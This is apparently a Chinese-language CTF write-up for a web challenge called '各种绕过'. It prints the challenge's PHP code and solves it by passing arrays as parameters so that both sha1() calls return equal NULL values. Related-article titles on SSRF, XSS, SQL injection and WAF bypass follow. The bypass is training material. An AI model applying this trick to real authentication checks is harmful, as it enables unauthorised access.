各种绕过

简介: 各种绕过110各种绕过哟http://120.24.86.145:8002/web7/get 接收 id 和 unamepost 接收 passwdsha1() 函数计算字符串的 SHA-1 散列根据函数性质,嗯,又是构造数组就好...

各种绕过
110
各种绕过哟
http://120.24.86.145:8002/web7/

<?php 
highlight_file('flag.php'); 
$_GET['id'] = urldecode($_GET['id']); 
$flag = 'flag{xxxxxxxxxxxxxxxxxx}'; 
if (isset($_GET['uname']) and isset($_POST['passwd'])) { 
    if ($_GET['uname'] == $_POST['passwd']) 

        print 'passwd can not be uname.'; 

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin')) 

        die('Flag: '.$flag); 

    else 

        print 'sorry!'; 

} 
?>
  • get 接收 id 和 uname
  • post 接收 passwd
  • sha1() 函数计算字符串的 SHA-1 散列

根据函数性质,嗯,又是构造数组就好了~
get:id=margin&&uname[]=9
post:passwd[]=8
可得flag

相关文章
|
2月前
|
安全 网络协议 网络安全
黑客10种绕过防火墙方法
黑客10种绕过防火墙方法
121 7
|
2月前
|
网络协议 安全 网络安全
ssrf检测防御与绕过
ssrf检测防御与绕过
|
2月前
|
安全 网络协议 NoSQL
SSRF漏洞深入利用与防御方案绕过技巧
SSRF漏洞深入利用与防御方案绕过技巧
201 0
|
5月前
|
安全 JavaScript API
文件上传漏洞——绕过
绕过客户端检测(JS检测) 绕过服务端检测(MIME类型检测、文件后缀检测、文件内容检测)
126 1
|
4月前
|
JavaScript 前端开发
常见XSS绕过技巧
常见XSS绕过技巧
247 0
|
7月前
|
SQL
14、sql注入绕过技术
14、sql注入绕过技术
57 0
|
监控 安全 JavaScript
某远控RCE绕过某数字的利用方式
某远控RCE绕过某数字的利用方式
302 2
|
JavaScript 安全 数据安全/隐私保护
dvwa下利用xss获取cookie并利用(绕过验证)
dvwa下利用xss获取cookie并利用(绕过验证)
809 0
|
SQL 安全 关系型数据库
SQL注入 安全狗apache4.0.26655绕过(上)
SQL注入 安全狗apache4.0.26655绕过
131 0
|
SQL 安全 数据库
SQL注入 安全狗apache4.0.26655绕过(下)
SQL注入 安全狗apache4.0.26655绕过
90 0